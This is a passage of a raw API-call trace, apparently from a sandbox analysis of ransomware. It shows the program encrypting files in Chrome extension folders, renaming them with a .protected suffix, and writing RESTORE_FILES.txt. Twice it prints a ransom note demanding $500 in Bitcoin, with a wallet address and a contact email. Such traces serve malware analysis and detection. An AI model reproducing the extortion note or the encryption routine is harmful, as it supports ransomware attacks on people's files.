returned 0x47bc10 [0078.645] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\.") returned 146 [0078.645] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\..") returned 147 [0078.645] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.645] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.645] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.646] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0078.646] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.646] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.646] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.646] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.646] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.647] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.648] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.648] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.648] CloseHandle (hObject=0x168) returned 1 [0078.648] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0078.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0078.649] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.649] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.649] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0078.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0078.650] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.650] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.650] lstrlenA (lpString="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") returned 684 [0078.651] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0078.651] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.651] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.651] CloseHandle (hObject=0x164) returned 1 [0078.651] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0078.651] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 144 [0078.651] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0078.651] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0078.651] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*") returned 146 [0078.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0078.651] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.651] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.651] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\.") returned 146 [0078.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\..") returned 147 [0078.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.652] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.652] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.652] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.652] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.652] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.653] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.654] CloseHandle (hObject=0x168) returned 1 [0078.654] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.protected") returned 168 [0078.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0078.655] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.655] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.655] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0078.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0078.656] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.656] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.656] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.656] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.657] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.657] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.657] CloseHandle (hObject=0x164) returned 1 [0078.657] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0078.657] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0078.657] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 141 [0078.657] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0078.657] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0078.657] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*") returned 143 [0078.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.658] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.658] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.658] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\.") returned 143 [0078.658] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.658] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.658] 
